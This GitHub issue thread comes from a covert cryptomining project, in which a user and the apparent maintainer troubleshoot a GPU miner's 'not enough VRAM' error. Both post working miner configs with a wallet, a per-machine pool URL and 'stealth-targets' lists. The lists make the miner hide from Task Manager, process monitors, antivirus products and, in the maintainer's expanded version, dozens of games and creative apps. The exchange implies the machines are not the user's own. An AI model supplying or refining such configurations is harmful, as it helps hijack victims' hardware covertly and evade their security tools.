### ISSUE TITLE
Ubqhash not enough VRAM

### ISSUE THREAD

**Issue by Pedrolito666** [UnamSanctam/SilentCryptoMiner#1029]
Hi, I don't know why but my ubqhash config doesn't work !
![IMG_20220816_151147](https://user-images.githubusercontent.com/110937628/184888732-558aacd3-72f4-4903-a749-b0dd7ca88044.jpg)

Here's my settings 

{
    "url": "stratum://`0xEE6D50d4DaD95446896AFA4340955df72C7bd535`.{COMPUTERNAME}@us.ubiqpool.io:8008",
    "algo": "ubqhash",
    "max-gpu": 30,
    "idle-wait": 1,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AnVir.exe,PLIhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,MSIAfterburner.exe",
    "kill-targets": ""
}

Thanks for your help man !!

**Comment by Pedrolito666** [comment]
Couple of 3050 and 1050 ti or not

**Comment by Pedrolito666** [comment]
And 1650 too

**Comment by UnamSanctam** [comment]
Can you expand one of them and post a screenshot? That configuration you just posted works for me.

**Comment by Pedrolito666** [comment]
![Uploading IMG_20220816_152640.jpg…]()

**Comment by Pedrolito666** [comment]
![IMG_20220816_152640](https://user-images.githubusercontent.com/110937628/184891430-bd744bc9-b231-4507-9eae-6f66654c1bed.jpg)

**Comment by Pedrolito666** [comment]
Maybe when I change the config on the panel it takes some Times to update the miner ?

**Comment by UnamSanctam** [comment]
No the information it shows there is what the miner is reporting, "Not enough free VRAM" only really happens when there actually isn't enough VRAM, you can try changing the pool (try picopool) or changing to ETC to test.

**Comment by Pedrolito666** [comment]
Ok thanks a lot I'm trying

**Comment by Pedrolito666** [comment]
It's the same thing.... I try both stratum and stratum+ssl and etc it's still not working.

**Comment by UnamSanctam** [comment]
Set to configuration to:
```
{
"url": "stratums://0xEE6D50d4DaD95446896AFA4340955df72C7bd535.{COMPUTERNAME}@ubiq-eu1.picopool.org:8443,
"algo": "ubqhash",
"max-gpu": 30,
"idle-wait": 1,
"idle-gpu": 100,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AnVir.exe,PLIhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,MSIAfterburner.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
"kill-targets": ""
}
```

**Comment by Pedrolito666** [comment]
It's don't working too

**Comment by Pedrolito666** [comment]
I need to put the ‘ before and After the wallet ?

**Comment by UnamSanctam** [comment]
Doesn't matter, sounds like they don't have enough VRAM. Do you have access to any of them?

**Comment by Pedrolito666** [comment]
Hey it work now for some of them ! So it's just a computer issue ! Thanks for your help !
